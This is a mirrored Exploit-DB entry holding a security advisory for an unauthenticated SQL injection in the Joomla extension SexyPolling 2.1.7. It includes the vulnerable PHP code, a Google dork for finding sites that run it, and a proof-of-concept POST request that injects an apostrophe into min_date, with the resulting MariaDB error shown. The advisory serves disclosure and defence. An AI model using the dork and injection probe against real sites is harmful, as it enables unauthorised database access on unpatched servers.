bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50927.txt
Offensive Security be24992411 DB: 2022-05-12 
42 changes to exploits/shellcodes

UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path
Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
ExifTool 12.23 - Arbitrary Code Execution
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService)
Prime95 Version 30.7 build 9 - Remote Code Execution (RCE)
Akka HTTP 10.1.14 - Denial of Service
USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
Bookeen Notea - Directory Traversal
SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
DLINK DIR850 - Insecure Access Control
DLINK DIR850 - Open Redirect
Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
Tenda HG6 v3.3.0 - Remote Command Injection
Google Chrome 78.0.3904.70 - Remote Code Execution
PyScript - Read Remote Python Source Code
DLINK DAP-1620 A1 v1.01 - Directory Traversal
Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)
ImpressCMS v1.4.4 - Unrestricted File Upload
Microfinance Management System 1.0 - 'customer_number' SQLi
WebTareas 2.4 - Blind SQLi (Authenticated)
WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)
Magento eCommerce CE v2.3.5-p2 - Blind SQLi
Bitrix24 - Remote Code Execution (RCE) (Authenticated)
CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)
e107 CMS v3.2.1 - Multiple Vulnerabilities
Anuko Time Tracker - SQLi (Authenticated)
TLR-2005KSH - Arbitrary File Upload
Explore CMS 1.0 - SQL Injection
Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)
PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS)
Beehive Forum - Account Takeover
MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)
Joomla Plugin SexyPolling 2.1.7 - SQLi
WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
2022-05-12 05:01:39 +00:00

147 lines
No EOL
4.8 KiB
Text
Raw Blame History

# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi
# Google Dork: intext:"Powered by Sexy Polling"
# Date: 2022-02-08
# Exploit Author: Wolfgang Hotwagner
# Vendor Homepage: https://2glux.com/projects/sexypolling
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip
# Version: all versions below version 2.1.8
# Tested on: Debian Bullseye
SexyPolling SQL Injection
====================
| Identifier: | AIT-SA-20220208-01|
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |
Summary
========
[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.
Vulnerability Description
====================
In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.
In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:
```
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```
These are later used unfiltered by the WHERE clause:
```
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";
//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```
Proof Of Concept
==============
To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.
HTTP-Request:
```
POST /components/com_sexypolling/vote.php HTTP/1.1
Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6
polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1
```
The HTTP-Resoonse contains a mysql error:
```
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta charset="utf-8" />
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near &#039;00:00:00&#039; AND sv.`date` <= &#039;2021-12-14 23:59:59&#039;&#039; at line 12</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
```
Vulnerable Versions
================
All versions below version 2.1.8
Tested Versions
=============
Sexy Polling ( Joomla Extension) 2.1.7
Impact
======
An unauthenticated attacker could inject and execute SQL commands on the database.
Mitigation
=========
Sexy Polling 2.1.8 fixed that issue
Vendor Contact Timeline
====================
| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |
*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*
Advisory URL
===========
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
Reference in a new issue View git blame Copy permalink